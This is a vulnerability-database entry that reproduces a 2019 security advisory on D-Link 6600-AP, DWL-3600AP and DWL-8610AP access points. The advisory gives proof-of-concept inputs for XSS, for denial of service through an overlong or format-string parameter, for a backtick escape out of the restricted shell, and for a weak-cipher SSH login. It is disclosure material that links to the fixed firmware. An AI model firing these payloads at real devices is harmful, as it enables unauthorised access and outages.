ID

VAR-201908-0912

CVE

CVE-2019-14334

TITLE

plural D-Link Vulnerabilities related to certificate validation in product devices

DESCRIPTION

An issue was discovered on D-Link 6600-AP, DWL-3600AP, and DWL-8610AP Ax 4.2.0.14 21/03/2019 devices. There is post-authenticated Certificate and RSA Private Key extraction through an insecure sslcert-get.cgi HTTP command. D-Link 6600-AP , DWL-3600AP , DWL-8610AP Devices have a certificate validation vulnerability.Information may be obtained. The D-Link 6600-AP is a wireless access point device from D-Link of Taiwan. A security vulnerability exists in the D-Link 6600-AP, DWL-3600AP, and DWL-8610AP. D-Link 6600-AP, etc. # Security Advisory - 22/07/2019 ## Multiple vulnerabilities found in the D-Link 6600-AP device running the latest firmware (version 4.2.0.14). D-Link 6600-AP is not produced anymore but the support is still provided by D-Link as per described on the D-Link website. Not that this product is built for business customers of D-Link and we can expect to have thousands of devices at risk. Code base shared with DWL-3600AP and DWL-8610AP ### This advisory is sent to D-Link the 22/05/2019 Many Thanks to the D-Link Security Team for their prompt reactivity! ### Affected Product D-Link 6600-AP, DWL-3600AP + Vulnerability number 2 affects also DWL-8610AP ### Firmware version 4.2.0.14 Revision Ax date: 21/03/2019 ### Last version available https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point ### Product Identifier WLAN-EAP ### Hardware Version A2 ### Manufacturer D-LINK ## Product Description The DWL-6600AP is designed to be the best-in-class indoor Access Point for business environments. With high data transmission speeds, load balancing features, it can be deployed as a standalone wireless Access Point or used as the foundation for a managed wireless network. Source: https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point ## List of Vulnerabilities 1. CVE-2019-14338 - Post-authenticated XSS 2. CVE-2019-14333 - Pre-authenticated Denial of service leading to the reboot of the AP 4. CVE-2019-14337 - Escape shell in the restricted command line interface 5. CVE-2019-14335 - Post-authenticated Denial of service leading to the reboot of the AP 6. CVE-2019-14336 - Post-authenticated Dump all the config files (post-auth) 7. CVE-2019-14332 - Use of weak ciphers for SSH ### 1. Post-authenticated XSS #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14338 #### Proof-of concept Example 1: http://10.90.90.91/admin.cgi?action=<script>alert(document.cookie)</script> Example 2: http://10.90.90.91/admin.cgi?action=+guest<script>alert('Pwned')</script> ### 2. Pre-authenticated Denial of service leading to the reboot of the AP #### Exploitation: Local #### Severity Level: High #### CVE ID: CVE-2019-14333 #### Proof-of concept kali# curl -X POST 'http://10.90.90.91/admin.cgi?action=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ### 4. Escape shell in the restricted command line interface #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14337 #### Proof-of concept DLINK-WLAN-AP# wget Invalid command. DLINK-WLAN-AP# `/bin/sh -c wget` BusyBox v1.18.2 (2019-01-24 14:39:11 IST) multi-call binary. Usage: wget [-c|--continue] [-s|--spider] [-q|--quiet] [-O|--output-document FILE] [--header 'header: value'] [-Y|--proxy on/off] [-P DIR] [--no-check-certificate] [-U|--user-agent AGENT][-T SEC] URL Retrieve files via HTTP or FTP Options: -s Spider mode - only check file existence -c Continue retrieval of aborted transfer -q Quiet -P DIR Save to DIR (default .) -T SEC Network read timeout is SEC seconds -O FILE Save to FILE ('-' for stdout) -U STR Use STR for User-Agent header -Y Use proxy ('on' or 'off') DLINK-WLAN-AP# ### 5. Post-authenticated Denial of service leading to the reboot of the AP #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14335 #### Proof-of concept http://10.90.90.91/admin.cgi?action=%s ### 6. Post-authenticated Dump all the config files #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14336 #### Proof-of concept http://10.90.90.91/admin.cgi?action= ### 7. Use of weak ciphers #### Exploitation: Local #### Severity Level: High #### CVE ID : CVE-2019-14332 #### Proof-of concept root@kali:~# ssh -l admin 10.90.90.91 -oKexAlgorithms=diffie-hellman-group1-sha1 The authenticity of host '10.90.90.91 (10.90.90.91)' can't be established. RSA key fingerprint is SHA256:X8FPwxBpaDJq77gKs/HxggThGUIXWH4nu6tukuW6PGI. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '10.90.90.91' (RSA) to the list of known hosts. admin@10.90.90.91's password: Enter 'help' for help. DLINK-WLAN-AP# help ## Report Timeline 22/05/2019 : This advisory is sent to D-Link - the contents of this Report will be made public within 30 days. 22/06/2019 : Public release of the security advisory to mailing list ## Fixes/Updates ftp://ftp2.dlink.com/PRODUCTS/DWL-3600AP/REVA/DWL-3600AP_REVA_FIRMWARE_v4.2.0.15.zip ftp://ftp2.dlink.com/PRODUCTS/DWL-6600AP/REVA/DWL-6600AP_REVA_FIRMWARE_v4.2.0.15.zip ## About me - pwn.sandstorm@gmail.com #### Independent EMSecurity Researcher in the field of IoT under the Sun #### Always open to hack and share #### Greetings - Ack P. Kim and others for the online resources

IOT TAXONOMY

AFFECTED PRODUCTS

CVSS

PROBLEMTYPE DATA

THREAT TYPE

local

TYPE

trust management problem

CONFIGURATIONS

PATCH

EXTERNAL IDS

REFERENCES

CREDITS

Sandstorm Security

SOURCES

LAST UPDATE DATE

2024-11-23T21:52:00.519000+00:00

SOURCES UPDATE DATE

SOURCES RELEASE DATE